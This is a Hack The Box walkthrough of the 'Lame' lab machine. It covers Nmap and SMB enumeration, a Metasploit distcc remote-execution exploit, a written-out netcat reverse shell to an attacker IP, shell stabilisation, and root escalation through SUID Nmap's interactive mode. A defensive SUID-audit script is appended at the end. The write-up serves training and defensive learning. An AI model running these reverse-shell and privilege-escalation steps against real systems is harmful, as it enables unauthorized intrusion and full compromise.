
Hack The Box – Lame Walkthrough

Introduction

This was an easy Linux box that involved exploiting a remote command execution vulnerability in the distcc service to gain an initial foothold, and then the Nmap interactive mode to escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan with the following flags (the default scan covers the 1000 most common ports, but -p- extends it to all of them):

  • -sC to run default scripts
  • -sV to enumerate application versions
  • -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
  • -p- to scan all ports

SMB Enumeration

Using Smbclient to enumerate available shares:

The next step was to run an Nmap scan on ports 139 and 445 with all SMB enumeration scripts, to further enumerate this service.

nmap -p 139,445 -Pn --script "smb-enum*" 10.10.10.3

I then ran another Nmap scan to check for any known vulnerabilities in the SMB service. Nmap ships a number of "smb-vuln-msxx-xxx" scripts that can be used to test the SMB service for public exploits.

No working exploits were found against this host.

Accessing the open shares using Smbclient, nothing useful was found.

distcc Exploitation

Using SearchSploit to find known vulnerabilities in the distcc service, a Metasploit module was found.

Starting msfconsole, selecting the distcc_exec module, setting the following options and running the exploit:

  • RHOST to specify the target host IP address
  • payload to specify the payload type, in this case the Linux CMD shell
  • LHOST to specify the local host IP address to connect to
  • LPORT to specify the local port to connect to

The exploit has granted a command shell.

The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Using Netcat on the victim host to send a reverse shell back to our listener:

nc -nv -e /bin/bash 10.10.14.14 443

The following steps can be done to obtain an interactive shell:

  • Running python -c 'import pty; pty.spawn("/bin/sh")' on the victim host
  • Hitting CTRL+Z to background the process and go back to our host
  • Running stty raw -echo on our host
  • Typing fg and hitting ENTER to go back to our reverse shell

Privilege Escalation

Checking for SUID and SGID binaries:

find / -perm -u=s -type f 2>/dev/null; find / -type f \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null

Versions of Nmap between 2.02 and 5.21 had an interactive mode which allowed users to execute shell commands. Because the Nmap binary has SUID permissions, this could be exploited to escalate privileges to root.

Checking the Nmap version with nmap --version.

Entering Nmap interactive mode (nmap --interactive) and running !sh to spawn an sh shell.

This has granted root access to the system.
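As an added defensive check, not part of the original walkthrough: the same SUID/SGID sweep the find command performs, but compared against an allowlist of set-id binaries you expect on the host, so that an unexpected setuid binary such as this box's old nmap stands out. The baseline paths below are constructed for illustration; a real one would come from your distribution's package manifests or a known-good image.

```python
import os
import stat
from typing import Dict, List, Tuple

# Constructed baseline of set-id binaries expected on a minimal Linux host, as
# paths relative to the scanned root (an assumption for this example only).
DEFAULT_BASELINE = frozenset({"usr/bin/passwd", "usr/bin/sudo", "bin/su"})


def find_setid_files(root: str) -> Dict[str, str]:
    """Map root-relative path -> 'SUID', 'SGID' or 'SUID+SGID' for every regular
    file under root carrying either bit. Symlinks are not followed (lstat and
    os.walk's default followlinks=False), so a link to a setuid target is not
    reported as a second finding."""
    found: Dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable entry: skip it rather than abort the audit
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = [label for flag, label in ((stat.S_ISUID, "SUID"), (stat.S_ISGID, "SGID"))
                    if st.st_mode & flag]
            if bits:
                found[os.path.relpath(path, root)] = "+".join(bits)
    return found


def audit_setid(root: str, baseline=DEFAULT_BASELINE) -> List[Tuple[str, str]]:
    """Return (relative path, bits) for set-id files under root that are NOT in
    the baseline, sorted by path. An empty list means nothing unexpected."""
    found = find_setid_files(root)
    return sorted((p, b) for p, b in found.items() if p not in baseline)


if __name__ == "__main__":
    import sys
    # Scan "/" by default; pass another directory to audit a mounted image.
    for path, bits in audit_setid(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"{bits:9} {path}")
```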

Conclusion

This was quite an interesting little box, as the distcc service is used for speeding up compilation of source code so it’s not something you would expect to see open on a server.

The privilege escalation part was quite easy, although it reminded me how important keeping software up to date is.